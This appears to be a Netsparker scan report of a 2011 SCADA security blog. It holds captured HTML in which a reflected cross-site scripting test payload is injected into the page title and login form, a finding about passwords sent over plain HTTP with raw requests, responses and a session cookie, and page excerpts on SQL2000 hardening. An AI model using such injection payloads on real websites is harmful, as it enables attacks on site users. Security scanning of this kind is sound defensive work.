id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being add..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:41 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11399
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-admin Css Colors-fresh Css'"-->< Style>< Script><script>netsparker(0x00042B)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=10" title="Emerging Threats Pro"><img src="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/uploads/SqJJy8_ad_april_2011_42K_v2-2.jpg" alt="Emerging Threats Pro" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-admin/css/colors-fresh.css\'\"--></style></script><script>netsparker(0x00042B)</script>/?_login=175314aab4"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-admin/css/colors-fresh.css\'\"--></style></script><script>netsparker(0x00042B)</script>/?_login=1eb901e58d" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being add..
Password Transmitted Over HTTP
Password Transmitted Over HTTP
1
TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.
Impact
If an attacker can intercept network traffic he/she can steal users credentials.
Actions to Take
- See the remedy for solution.
- Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
|
- /
/ CONFIRMED |
Form target action
http://www.digitalbond.com/?_login=901a9f54ca
Request
GET / HTTP/1.1
Referer: https://www.digitalbond.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: https://www.digitalbond.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 19 Apr 2011 19:04:40 GMT
Vary: Cookie,User-Agent,Accept-Encoding
Expires: Tue, 19 Apr 2011 21:04:40 GMT
Pragma: public
Etag: 8a23d5686352708df19d38ee5e9312c0
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Cacheable: NO:Passed
Cache-Control: max-age=0, must-revalidate
X-Varnish: 1668547416
Age: 0
Via: 1.1 varnish
X-Cache: PASS
X-Type: varnish-short
Content-Encoding:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Digital Bond's SCADA Security Portal</title>
<link rel="shortcut icon" href="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="http://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="http://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="http://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='blackbirdpie-css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/css/blackbirdpie.css?ver=20110404' type='text/css' media='all' /><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/js/blackbirdpie.js?ver=20110404'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='http://www.digitalbond.com/' /><link rel='shortlink' href='http://wp.me/1lryr' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,382] --><meta name="description" content="A site for SCADA Security and Control System IT information. The latest on SCADA, DCS and ICS Security including SCADA Security Consulting and SCADA Security Research." /><meta name="keywords" content="SCADA Security, ICS Security, DCS Security, SCADA IDS, SCADA Vulnerability, SCADA Firewall, Digital Bond, Bandolier, Quickdraw, Portaledge, SCADA Honeynet, Critical-Intelligence, Control System Security, SCADA Security Consulting" /><link rel="canonical" href="http://www.digitalbond.com/" /><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('http://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="http://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="home blog">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item current_page_item"><a href="http://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="http://www.digitalbond.com/"><img class="logo" src="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=10" title="Emerging Threats Pro"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/SqJJy8_ad_april_2011_42K_v2-2.jpg" alt="Emerging Threats Pro" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<div class="post-9778 post type-post status-publish format-standard hentry category-control-system-it category-ics-security-technologies tag-database-security tag-security-hardening tag-sql-server odd" id="post-9778">
<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2011/04/19/sql2000-server-security/" rel="bookmark" title="Permanent Link to SQL2000 Server Security">SQL2000 Server Security</a></h2>
</div>
<div class="post-byline">Marco Cajina</div>
<div class="post-bodycopy clearfix"><div class="twitter_button" style="float: right; margin-left: 10px;"><iframe src="http://platform.twitter.com/widgets/tweet_button.html?url=http%3A%2F%2Fwww.digitalbond.com%2F2011%2F04%2F19%2Fsql2000-server-security%2F&count=horizontal&related=digitalbond:&via=digitalbond&lang=en" height="20" width="110" frameborder="0" scrolling="no" allowtransparency="true"></iframe></div><p><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/basics.jpg"><img class="alignleft size-full wp-image-9786" title="basics" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/basics.jpg" alt="" width="240" height="185" /></a></p><p style="padding-top: 30px;">First, how many of you can actually say that you can be 100% certain that you know the exact number of SQL servers in your environment? Also, how many of you are certain that they are locked down? Were you aware that there is a stored procedure that runs commands as the Local System account and that it is enabled by default on SQL2000 or earlier versions of SQL?</p><p>The topic of security hardening typically covers lowering the footprint of the operating system and control system software to minimize risk exposure; however, it should also cover lowering the database footprint. Here is a general guide for hardening your SQL2000 or earlier servers.</p><ul><li>Generate a password for the built-in SA account.</li><li>Create and use a service account to run the SQL Windows services to minimize the impact of a compromised database server or instance.</li><li>Revoke the BuiltIn\Administrators groups access sysadmin access to the database server. You can then create new logins for any Windows accounts that need access to the database (i.e. Service Accounts, DBAs, etc.).</li><li>Revoke access to the xp_cmdshell and other extended stored procedures. You can create a new role and only grant that role access to execute the procedures.</li><li>Remove the named pipes connectivity and use TCP/IP connections only.</li></ul><p> <a href="http://www.digitalbond.com/2011/04/19/sql2000-server-security/#more-9778" class="more-link">Read More</a></p></div>
<div class="post-footer">19 April 2011 | <a href="http://www.digitalbond.com/2011/04/19/sql2000-server-security/#respond" class="comments-link" title="Comment on SQL2000 Server Security">Leave a comment</a></div>
</div><!-- / Post -->
<div class="post-9773 post type-post status-publish format-standard hentry category-1 tag-critical-intelligence tag-ics-security-calendar even" id="post-9773">
<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2011/04/15/friday-news-and-notes-130/" rel="bookmark" title="Permanent Link to Friday News and Notes">Friday News and Notes</a></h2>
</div>
<div class="post-byline">Dale G Peterson</div>
<div class="post-bodycopy clearfix"><div class="twitter_button" style="float: right; margin-left: 10px;"><iframe src="http://platform.twitter.com/widgets/tweet_button.html?url=http%3A%2F%2Fwww.digitalbond.com%2F2011%2F04%2F15%2Ffriday-news-and-notes-130%2F&count=horizontal&related=digitalbond:&via=digitalbond&lang=en" height="20" width="110" frameborder="0" scrolling="no" allowtransparency="true"></iframe></div><p><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/fork.jpg"><img class="alignleft size-full wp-image-9774" title="fork" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/fork.jpg" alt="SCADA Security" width="180" height="240" /></a></p><p style="padding-top: 30px;">A record breaking Microsoft Patch Tuesday this week with at least 64 security vulnerabilities fixed. <a href="http://krebsonsecurity.com/2011/04/microsoft-issues-monster-patch-update/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+KrebsOnSecurity+%28Krebs+on+Security%29">Krebs highlights one in particular</a>. “Attackers could exploit the flaw addressed by MS11-020 by sending a single, specially crafted evil data packet to a targeted system. This is the type of flaw that should concern any network administrator, because it has high potential to be used to power an automated computer worm.”</p><p>Another week and two more ICS vulnerabilites. This time in <a href="http://www.us-cert.gov/control_systems/pdf/ICSA-11-094-01.pdf">Wonderware’s InBatch Client</a> and <a href="http://www.us-cert.gov/control_systems/pdf/ICSA-11-103-01.pdf">Honeywell’s ScanServer</a>. Wonderware is a very popular and is often used to modernize the HMI’s in older control systems and also as the complete SCADA solution for smaller installations. Honewell’s ScanServer is used in building automation, especially HVAC. NCCIC also released <a href="http://www.us-cert.gov/control_systems/pdf/NCCIC_Phishing_Advisory.pdf">a bulletin on spear phishing</a>, perhaps because both of the vulnerabilities would likely require some amount of social engineering.</p><h3>Tweet of the Week</h3><!-- tweet id : 58523720687435776 --> <style type='text/css'> #bbpBox_58523720687435776 a { text-decoration:none; color:#0084B4; } #bbpBox_58523720687435776 a:hover { text-decoration:underline; } </style> <div id='bbpBox_58523720687435776' class='bbpBox' style='padding:20px; margin:5px 0; background-color:#C0DEED; background-image:url(http://a3.twimg.com/a/1302111227/images/themes/theme1/bg.png); background-repeat:no-repeat'> <div style='background:#fff; padding:10px; margin:0; min-height:48px; color:#333333; -moz-border-radius:5px; -webkit-border-radius:5px;'> <span style='width:100%; font-size:18px; line-height:22px;'> What would you do if Law Enforcement wanted to seize a CCA for evidence purposes? <a href="http://twitter.com/search?q=%23IRPExercise" title="#IRPExercise">#IRPExercise</a> </span> <div class='bbp-actions' style='font-size:12px; width:100%; padding:5px 0; margin:0 0 10px 0; border-bottom:1px solid #e6e6e6;'> <img align='middle' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie//images/bird.png' /> <a title='tweeted on 14 Apr 2011 08:35' href='http://twitter.com/#!/mtoecker/status/58523720687435776' target='_blank'>14 Apr 2011 08:35</a> via web <a href='https://twitter.com/intent/tweet?in_reply_to=58523720687435776' class='bbp-action bbp-reply-action' title='Reply'> <span><em style='margin-left: 1em;'></em><strong>Reply</strong></span> </a> <a href='https://twitter.com/intent/retweet?tweet_id=58523720687435776' class='bbp-action bbp-retweet-action' title='Retweet'> <span><em style='margin-left: 1em;'></em><strong>Retw..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 19 Apr 2011 19:04:40 GMT
Vary: Cookie,User-Agent,Accept-Encoding
Expires: Tue, 19 Apr 2011 21:04:40 GMT
Pragma: public
Etag: 8a23d5686352708df19d38ee5e9312c0
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Cacheable: NO:Passed
Cache-Control: max-age=0, must-revalidate
X-Varnish: 1668547416
Age: 0
Via: 1.1 varnish
X-Cache: PASS
X-Type: varnish-short
Content-Encoding:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
